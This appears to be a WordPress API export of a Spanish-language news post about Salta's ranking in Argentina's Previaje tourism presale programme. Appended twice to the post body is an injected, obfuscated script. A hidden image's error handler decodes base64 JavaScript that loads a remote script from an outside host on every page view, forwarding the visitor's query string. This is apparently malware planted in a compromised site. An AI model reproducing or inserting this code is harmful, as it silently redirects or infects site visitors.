{"id":1489,"date":"2022-09-15T12:47:00","date_gmt":"2022-09-15T15:47:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1489"},"modified":"2025-08-14T00:35:22","modified_gmt":"2025-08-14T03:35:22","slug":"previaje-salta-nuevamente-entre-los-destinos-mas-elegidos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1489","title":{"rendered":"Previaje: \u00a0Salta nuevamente entre los destinos m\u00e1s elegidos"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#846308\"><em>La provincia contin\u00faa entre las primeras opciones del programa de preventa impulsado por el Ministerio de Turismo de la Naci\u00f3n. La diversidad de oferta, el contexto con la naturaleza y la conectividad son factores claves.<\/em><\/h4>\n\n\n\n<p>La tercera edici\u00f3n del programa Previaje gener\u00f3 expectativas y un gran nivel de ventas cuando abri\u00f3 el per\u00edodo de preventas para viajar durante octubre, noviembre y diciembre. En este contexto de crecimiento del mercado tur\u00edstico, Salta contin\u00faa entre los principales destinos elegidos para visitar en los pr\u00f3ximos meses por lo que se espera un intenso movimiento hasta fin de a\u00f1o.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de la Naci\u00f3n inform\u00f3 que Salta es la s\u00e9ptima provincia m\u00e1s elegida con 49.018 turistas que generar\u00e1n consumos por $1.124 millones; en tanto la ciudad de Salta por el ser el eje en materia de conectividad con el aeropuerto internacional de referencia en la regi\u00f3n, es la tercera localidad entre las opciones nacionales al ser un centro distribuidor para la regi\u00f3n, sumando adem\u00e1s atractivos culturales \u00fanicos, gastronom\u00eda y el casco hist\u00f3rico mejor conservado del pa\u00eds<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4110-salta-entre-los-destinos-mas-elegidos-de-la-tercera-edicion-de-previaje.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4110-salta-entre-los-destinos-mas-elegidos-de-la-tercera-edicion-de-previaje.jpg\" alt=\"Salta entre los destinos m\u00e1s elegidos de la tercera edici\u00f3n de Previaje.\"\/><\/a><\/figure>\n\n\n\n<p>El \u00e9xito de esta edici\u00f3n ocasion\u00f3 que Naci\u00f3n acorte los plazos, hoy 14 de septiembre ser\u00e1 el \u00faltimo d\u00eda en el que se podr\u00e1n adquirir servicios para viajar entre el 1 de noviembre y el 5 de diciembre; ma\u00f1ana 15 de septiembre es la fecha l\u00edmite para cargar en el sistema los comprobantes (previaje.gob.ar).<\/p>\n\n\n\n<p>\u201cVenimos trabajando de manera estrat\u00e9gica en romper la estacionalidad y el Previaje acompa\u00f1a con gran fuerza este crecimiento\u201d, indic\u00f3 el ministro de Turismo y Deportes Mario Pe\u00f1a quien marc\u00f3 para el a\u00f1o una tendencia con \u00edndices superiores a niveles de prepandemia. \u201cHay un nuevo comportamiento de viajar por fuera de las vacaciones tradicionales y este programa de preventa nacional fue un acierto\u201d.<\/p>\n\n\n\n<p>La diversidad de oferta, el contexto con la naturaleza, la unicidad cultural y la conectividad son factores claves en los que Salta se destaca para la toma de decisi\u00f3n del turista que encuentra un nutrido calendario de actividades.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4111-salta-entre-los-destinos-mas-elegidos-de-la-tercera-edicion-de-previaje.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4111-salta-entre-los-destinos-mas-elegidos-de-la-tercera-edicion-de-previaje.jpg\" alt=\"Salta entre los destinos m\u00e1s elegidos de la tercera edici\u00f3n de Previaje.\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/previaje-salta-nuevamente-entre-los-destinos-mas-elegidos-84904\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La provincia contin\u00faa entre las primeras opciones del programa de preventa impulsado por el Ministerio de Turismo de la Naci\u00f3n. La diversidad de oferta, el contexto con la naturaleza y la conectividad son factores claves. La tercera edici\u00f3n del programa Previaje gener\u00f3 expectativas y un gran nivel de ventas cuando abri\u00f3 el per\u00edodo de preventas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1490,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21,17],"tags":[],"class_list":{"0":"post-1489","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional","9":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1489"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1489"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1489\/revisions"}],"predecessor-version":[{"id":7349,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1489\/revisions\/7349"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1490"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1489"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1489"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1489"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}